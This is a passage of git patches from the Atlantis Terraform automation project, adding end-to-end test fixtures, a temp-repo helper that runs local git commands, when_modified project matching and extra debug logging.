"https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + 
"following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt new file mode 100644 index 0000000000..4d254afae5 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +this = default + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. 
+ + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf index 648c412e1f..028fbb2139 100644 --- a/server/testfixtures/test-repos/simple/main.tf +++ b/server/testfixtures/test-repos/simple/main.tf @@ -1,3 +1,11 @@ resource "null_resource" "simple" { count = 1 +} + +variable "var" { + default = "default" +} + +output "this" { + value = "${var.var}" } \ No newline at end of file From a162b36b94305c75877c56328335f36baeecca4e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 16 Jun 2018 20:54:29 +0100 Subject: [PATCH 25/69] Remove need for .git in test fixtures. 
--- server/events_controller_e2e_test.go | 43 ++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 5 deletions(-) diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 8a9bd66915..35795cb3e7 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,6 +6,7 @@ import ( "io/ioutil" "net/http" "net/http/httptest" + "os/exec" "path/filepath" "regexp" "strings" @@ -72,8 +73,8 @@ func TestGitHubWorkflow(t *testing.T) { ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) t.Run(c.Description, func(t *testing.T) { // Set the repo to be cloned through the testing backdoor. - repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir)) - Ok(t, err) + repoDir, cleanup := initializeRepo(t, c.RepoDir) + defer cleanup() atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) // Setup test dependencies. @@ -99,14 +100,14 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") - _, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + _, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) Ok(t, err) // Replace all 'ID: 1111818181' strings with * so we can do a comparison. idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)") - Equals(t, string(exp), autoplanComment) + atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") + Equals(t, string(exp), atlantisComment) } // Finally, send the pull request merged event. 
@@ -302,3 +303,35 @@ func GitHubPullRequestParsed() *github.PullRequest { }, } } + +// initializeRepo copies the repo data from testfixtures and initializes a new +// git repo in a temp directory. It returns that directory and a function +// to run in a defer that will delete the dir. +// The purpose of this function is to create a real git repository with a branch +// called 'branch' from the files under repoDir. This is so we can check in +// those files normally without needing a .git directory. +func initializeRepo(t *testing.T, repoDir string) (string, func()) { + originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) + Ok(t, err) + + // Copy the files to the temp dir. + destDir, cleanup := TempDir(t) + runCmd(t, "", "cp", "-r", fmt.Sprintf("%s/.", originRepo), destDir) + + // Initialize the git repo. + runCmd(t, destDir, "git", "init") + runCmd(t, destDir, "git", "add", ".gitkeep") + runCmd(t, destDir, "git", "commit", "-m", "initial commit") + runCmd(t, destDir, "git", "checkout", "-b", "branch") + runCmd(t, destDir, "git", "add", ".") + runCmd(t, destDir, "git", "commit", "-am", "branch commit") + + return destDir, cleanup +} + +func runCmd(t *testing.T, dir string, name string, args ...string) { + cpCmd := exec.Command(name, args...) + cpCmd.Dir = dir + cpOut, err := cpCmd.CombinedOutput() + Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut) +} From de5c4061bdc4e019272fb249938353008ccfee8e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 10:28:58 +0100 Subject: [PATCH 26/69] Add -var test. 
--- server/events_controller_e2e_test.go | 18 ++++++++++++--- .../simple/exp-output-apply-var.txt | 13 +++++++++++ .../simple/exp-output-atlantis-plan-var.txt | 23 +++++++++++++++++++ 3 files changed, 51 insertions(+), 3 deletions(-) create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 35795cb3e7..a791a89bda 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -68,10 +68,21 @@ func TestGitHubWorkflow(t *testing.T) { }, ExpMergeCommentFile: "exp-output-merge.txt", }, + { + Description: "simple with comment -var", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt", + "atlantis apply", "exp-output-apply-var.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, } for _, c := range cases { - ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) t.Run(c.Description, func(t *testing.T) { + ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) // Set the repo to be cloned through the testing backdoor. 
repoDir, cleanup := initializeRepo(t, c.RepoDir) defer cleanup() @@ -100,7 +111,7 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") - _, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) Ok(t, err) @@ -115,7 +126,8 @@ func TestGitHubWorkflow(t *testing.T) { w = httptest.NewRecorder() ctrl.Post(w, pullClosedReq) responseContains(t, w, 200, "Pull request cleaned successfully") - _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + numPrevComments := (len(c.CommentAndReplies) / 2) + 1 + _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) Ok(t, err) Equals(t, string(exp), pullClosedComment) diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt new file mode 100644 index 0000000000..3c58045de2 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. 
+ +Outputs: + +this = overridden + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + From d9a47361e511ba30f9f281821a643071b9777735 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 19:55:14 +0100 Subject: [PATCH 27/69] Implement when_modified. 
--- server/events/command_handler.go | 2 + server/events/event_parser.go | 6 ++ server/events/models/models.go | 4 ++ server/events/project_operator.go | 6 ++ server/events/pull_request_operator.go | 64 +++++++++++++++++-- server/events_controller.go | 14 ++++ server/events_controller_e2e_test.go | 56 ++++++++++++---- .../test-repos/simple-yaml/atlantis.yaml | 24 +++++++ .../simple-yaml/exp-output-apply-default.txt | 14 ++++ .../simple-yaml/exp-output-apply-staging.txt | 14 ++++ .../simple-yaml/exp-output-autoplan.txt | 51 +++++++++++++++ .../simple-yaml/exp-output-merge.txt | 3 + .../test-repos/simple-yaml/main.tf | 15 +++++ .../test-repos/simple-yaml/staging.tfvars | 1 + .../testfixtures/test-repos/simple/.gitkeep | 0 ...exp-output-apply-var-default-workspace.txt | 14 ++++ .../exp-output-apply-var-new-workspace.txt | 14 ++++ .../simple/exp-output-apply-var.txt | 3 +- .../test-repos/simple/exp-output-apply.txt | 3 +- ...exp-output-atlantis-plan-new-workspace.txt | 23 +++++++ ...t-atlantis-plan-var-default-workspace.txt} | 0 .../simple/exp-output-merge-workspaces.txt | 3 + server/testfixtures/test-repos/simple/main.tf | 6 +- 23 files changed, 316 insertions(+), 24 deletions(-) create mode 100644 server/testfixtures/test-repos/simple-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/simple-yaml/main.tf create mode 100644 server/testfixtures/test-repos/simple-yaml/staging.tfvars delete mode 100644 server/testfixtures/test-repos/simple/.gitkeep create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt create mode 100644 
server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt rename server/testfixtures/test-repos/simple/{exp-output-atlantis-plan-var.txt => exp-output-atlantis-plan-var-default-workspace.txt} (100%) create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt diff --git a/server/events/command_handler.go b/server/events/command_handler.go index e327c13ee3..601d3be099 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -150,6 +150,7 @@ func (c *CommandHandler) run(ctx *CommandContext) { return } + ctx.Log.Debug("updating commit status to pending") if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } @@ -163,6 +164,7 @@ func (c *CommandHandler) run(ctx *CommandContext) { c.updatePull(ctx, CommandResponse{Failure: errMsg}) return } + ctx.Log.Debug("successfully acquired workspace lock") defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) var cr CommandResponse diff --git a/server/events/event_parser.go b/server/events/event_parser.go index bfe08a6c68..448dcee867 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -14,8 +14,10 @@ package events import ( + "fmt" "path" "regexp" + "strings" "github.com/google/go-github/github" "github.com/lkysow/go-gitlab" @@ -47,6 +49,10 @@ type Command struct { Autoplan bool } +func (c Command) String() string { + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ",")) +} + // NewCommand constructs a Command, setting all missing fields to defaults. 
func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. diff --git a/server/events/models/models.go b/server/events/models/models.go index 30faf4ea23..d4ba85fee0 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -163,6 +163,10 @@ type Project struct { Path string } +func (p Project) String() string { + return fmt.Sprintf("repofullname=%s path=%s", p.RepoFullName, p.Path) +} + // Plan is the result of running an Atlantis plan command. // This model is used to represent a plan on disk. type Plan struct { diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 2c6c5c558b..5e7e7e43e9 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -62,10 +62,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr if !lockAttempt.LockAcquired { return ProjectResult{Failure: lockAttempt.LockFailureReason} } + ctx.Log.Debug("acquired lock for project") // Ensure project has been cloned. 
var projAbsPath string if projAbsPathPtr == nil { + ctx.Log.Debug("project has not yet been cloned") repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) if err != nil { if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { @@ -74,15 +76,19 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr return ProjectResult{Error: err} } projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) + ctx.Log.Debug("project successfully cloned to %q", projAbsPath) } else { projAbsPath = *projAbsPathPtr + ctx.Log.Debug("project was already cloned to %q", projAbsPath) } // Use default stage unless another workflow is defined in config stage := p.defaultPlanStage() if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + ctx.Log.Debug("project configured to use workflow %q", *ctx.ProjectConfig.Workflow) configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow) if configuredStage != nil { + ctx.Log.Debug("project will use the configured stage for that workflow") stage = *configuredStage } } diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index b393fb5b75..6012214f52 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -4,7 +4,9 @@ import ( "os" "path/filepath" + "github.com/docker/docker/pkg/fileutils" "github.com/hashicorp/go-version" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/yaml" @@ -43,17 +45,24 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon } // Parse config file if it exists. 
+ ctx.Log.Debug("parsing config file") config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } noAtlantisYAML := os.IsNotExist(err) + if noAtlantisYAML { + ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename) + } else { + ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename) + } // We'll need the list of modified files. modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) if err != nil { return CommandResponse{Error: err} } + ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles)) // Prepare the project contexts so the ProjectOperator can execute. var projCtxs []models.ProjectCommandContext @@ -62,6 +71,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // was modified in the pull request. if noAtlantisYAML { modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir) + ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects) for _, mp := range modifiedProjects { projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, @@ -79,8 +89,16 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon } else { // Otherwise, we use the projects that match the WhenModified fields // in the config file. - matchingProjects := p.matchingProjects(modifiedFiles, config) - for _, mp := range matchingProjects { + matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config) + if err != nil { + return CommandResponse{Error: err} + } + ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects)) + + // Use for i instead of range because need to get the pointer to the + // project config. 
+ for i := 0; i < len(matchingProjects); i++ { + mp := matchingProjects[i] projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -193,9 +211,41 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { - //todo - // match the modified files against the config - // remember the modified_files paths are relative to the project paths - return nil +func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { + var projects []valid.Project + for _, project := range config.Projects { + log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace) + if !project.Autoplan.Enabled { + log.Debug("autoplan disabled, ignoring") + continue + } + // Prepend project dir to when modified patterns because the patterns + // are relative to the project dirs but our list of modified files is + // relative to the repo root. + var whenModifiedRelToRepoRoot []string + for _, wm := range project.Autoplan.WhenModified { + whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm)) + } + pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot) + if err != nil { + return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified) + } + + // If any of the modified files matches the pattern then this project is + // considered modified. 
+ for _, file := range modifiedFiles { + match, err := pm.Matches(file) + if err != nil { + log.Debug("match err for file %q: %s", file, err) + continue + } + if match { + log.Debug("file %q matched pattern", file) + projects = append(projects, project) + break + } + } + } + // todo: check if dir is deleted though + return projects, nil } diff --git a/server/events_controller.go b/server/events_controller.go index e9ee6e1e01..d9e344fe55 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -65,6 +65,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) { e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitHub") return } + e.Logger.Debug("handling GitHub post") e.handleGithubPost(w, r) return } else if r.Header.Get(gitlabHeader) != "" { @@ -72,6 +73,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) { e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitLab") return } + e.Logger.Debug("handling GitLab post") e.handleGitlabPost(w, r) return } @@ -85,13 +87,16 @@ func (e *EventsController) handleGithubPost(w http.ResponseWriter, r *http.Reque e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return } + e.Logger.Debug("request valid") githubReqID := "X-Github-Delivery=" + r.Header.Get("X-Github-Delivery") event, _ := github.ParseWebHook(github.WebHookType(r), payload) switch event := event.(type) { case *github.IssueCommentEvent: + e.Logger.Debug("handling as comment event") e.HandleGithubCommentEvent(w, event, githubReqID) case *github.PullRequestEvent: + e.Logger.Debug("handling as pull request event") e.HandleGithubPullRequestEvent(w, event, githubReqID) default: e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event %s", githubReqID) @@ -144,6 +149,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p default: eventType = 
OtherPullEvent } + e.Logger.Info("identified event as type %q", eventType) e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) } @@ -177,6 +183,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + e.Logger.Info("executing command %s", autoplanCmd) if !e.TestingMode { go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) } else { @@ -206,10 +213,14 @@ func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Reque e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return } + e.Logger.Debug("request valid") + switch event := event.(type) { case gitlab.MergeCommentEvent: + e.Logger.Debug("handling as comment event") e.HandleGitlabCommentEvent(w, event) case gitlab.MergeEvent: + e.Logger.Debug("handling as pull request event") e.HandleGitlabMergeRequestEvent(w, event) default: e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event") @@ -239,6 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated) return } + e.Logger.Info("parsed comment as %s", parseResult) // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. @@ -260,6 +272,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo return } + e.Logger.Debug("executing command") fmt.Fprintln(w, "Processing...") if !e.TestingMode { // Respond with success and then actually execute the command asynchronously. 
@@ -292,6 +305,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, default: eventType = OtherPullEvent } + e.Logger.Info("identified event as type %q", eventType) e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) } diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index a791a89bda..e2bb30ff6e 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -58,24 +58,48 @@ func TestGitHubWorkflow(t *testing.T) { ExpMergeCommentFile string CommentAndReplies []string }{ + //{ + // Description: "simple", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis apply", "exp-output-apply.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge.txt", + //}, + //{ + // Description: "simple with comment -var", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", + // "atlantis apply", "exp-output-apply-var.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge.txt", + //}, + //{ + // Description: "simple with workspaces", + // RepoDir: "simple", + // ModifiedFiles: []string{"main.tf"}, + // ExpAutoplanCommentFile: "exp-output-autoplan.txt", + // CommentAndReplies: []string{ + // "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", + // "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", + // "atlantis apply", "exp-output-apply-var-default-workspace.txt", + // "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", + // }, + // ExpMergeCommentFile: "exp-output-merge-workspaces.txt", + //}, { - Description: "simple", - RepoDir: "simple", + 
Description: "simple with atlantis.yaml", + RepoDir: "simple-yaml", ModifiedFiles: []string{"main.tf"}, ExpAutoplanCommentFile: "exp-output-autoplan.txt", CommentAndReplies: []string{ - "atlantis apply", "exp-output-apply.txt", - }, - ExpMergeCommentFile: "exp-output-merge.txt", - }, - { - Description: "simple with comment -var", - RepoDir: "simple", - ModifiedFiles: []string{"main.tf"}, - ExpAutoplanCommentFile: "exp-output-autoplan.txt", - CommentAndReplies: []string{ - "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt", - "atlantis apply", "exp-output-apply-var.txt", + "atlantis apply -w staging", "exp-output-apply-staging.txt", + "atlantis apply", "exp-output-apply-default.txt", }, ExpMergeCommentFile: "exp-output-merge.txt", }, @@ -118,6 +142,9 @@ func TestGitHubWorkflow(t *testing.T) { // Replace all 'ID: 1111818181' strings with * so we can do a comparison. idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") + if string(exp) != atlantisComment { + t.Logf("comment: %s", comment) + } Equals(t, string(exp), atlantisComment) } @@ -332,6 +359,7 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) { // Initialize the git repo. runCmd(t, destDir, "git", "init") + runCmd(t, destDir, "touch", ".gitkeep") runCmd(t, destDir, "git", "add", ".gitkeep") runCmd(t, destDir, "git", "commit", "-m", "initial commit") runCmd(t, destDir, "git", "checkout", "-b", "branch") diff --git a/server/testfixtures/test-repos/simple-yaml/atlantis.yaml b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml new file mode 100644 index 0000000000..62e6047617 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml @@ -0,0 +1,24 @@ +version: 2 +projects: +- dir: . + workspace: default + workflow: default +- dir: . + workspace: staging + workflow: staging +workflows: + default: + # Only specify plan so should use default apply workflow. 
